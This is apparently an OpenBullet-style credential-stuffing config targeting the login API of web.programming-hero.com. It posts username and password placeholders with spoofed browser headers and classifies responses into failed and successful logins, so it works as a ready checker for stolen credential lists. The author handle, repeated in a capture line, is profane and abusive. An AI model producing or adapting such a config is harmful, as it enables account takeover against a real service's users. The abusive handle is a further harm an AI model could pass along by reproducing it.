[SETTINGS]
{
  "Name": "web.programming-hero.com",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-04-01T23:13:32.5726301+00:00",
  "AdditionalInfo": "",
  "Author": "@YOUR_MOTHER_FUCKER_BITCH",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://web.programming-hero.com/api/user/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"platform\":\"Windows 10\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: web.programming-hero.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0" 
  HEADER "Accept: */*" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Authorization: undefined" 
  HEADER "Content-Type: application/json;charset=utf-8" 
  HEADER "Content-Length: 81" 
  HEADER "Origin: https://web.programming-hero.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Referer: https://web.programming-hero.com/login" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "{\"success\":false,\"msg\":\"Could not find user\"}" 
  KEYCHAIN Success OR 
    KEY "{\"success\":true,\"token" 

FUNCTION Constant "@YOUR_MOTHER_FUCKER_BITCH" -> CAP "CONFIG BY:" 

